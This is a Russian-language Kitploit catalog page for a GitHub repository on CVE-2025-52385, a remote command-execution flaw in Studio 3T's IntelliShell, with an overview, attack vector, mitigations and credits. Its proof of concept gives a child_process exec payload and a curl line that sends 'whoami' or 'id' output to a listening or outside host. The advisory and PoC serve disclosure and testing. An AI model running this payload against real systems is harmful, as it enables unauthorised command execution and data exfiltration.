Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-52385 — Studio 3T v.2025.1.0 | Kitploit
Инструменты/GitHubGitHub/kov404/cve-2025-52385
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubkov404/cve-2025-52385

CVE-2025-52385

Studio 3T v.2025.1.0

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-52385

Программное обеспечение: Studio 3T v.2025.1.0

Отчёт об уязвимости: Удалённое выполнение команд в Studio 3T

Обзор Критическая уязвимость в Studio 3T версии 2025.1.0 и более ранних позволяет удалённому злоумышленнику выполнять произвольный код с помощью специально созданной нагрузки, использующей модуль child_process в компоненте IntelliShell.

Детали Тип уязвимости: Удалённое выполнение команд Затронутый продукт: Studio 3T, версия <= 2025.1.0 Затронутый компонент: IntelliShell Тип атаки: Удалённая Воздействия: Выполнение кода: Да Отказ в обслуживании: Да Повышение привилегий: Да

Описание Уязвимость позволяет удалённому злоумышленнику выполнять произвольные команды операционной системы, отправляя вредоносную нагрузку JavaScript через IntelliShell, используя модуль child_process. Это уязвимость слепого выполнения, то есть прямой вывод злоумышленнику не возвращается.

Вектор атаки

Установите соединение с экземпляром MongoDB. Отправьте вредоносную нагрузку JavaScript через IntelliShell, использующую модуль child_process для выполнения произвольных команд операционной системы.

Доказательство концепции Для проверки уязвимости выполните следующие шаги:

Настройте локальный HTTP-сервер:

root@kitploit:~
python3 -m http.server 80

Выполните следующую нагрузку JavaScript в IntelliShell:

root@kitploit:~
const {exec} = require('child_process');
exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));

В качестве альтернативы используйте команду ниже как проверочный вектор:

root@kitploit:~
curl http://site/$(id)

Ссылки

Официальный сайт Studio 3T

Репозиторий Studio 3T на GitHub

CWE-78: Внедрение команд ОС

CWE-94: Внедрение кода

Меры по смягчению Пользователи: Обновитесь до исправленной версии Studio 3T (если доступно) или избегайте использования IntelliShell с ненадёжными подключениями MongoDB. Разработчики: Ограничьте или очищайте входные данные для модуля child_process в IntelliShell для предотвращения несанкционированного выполнения команд.

Благодарности Эта уязвимость была обнаружена и сообщена Кайо Мендонса Перейрой.

Скачать инструмент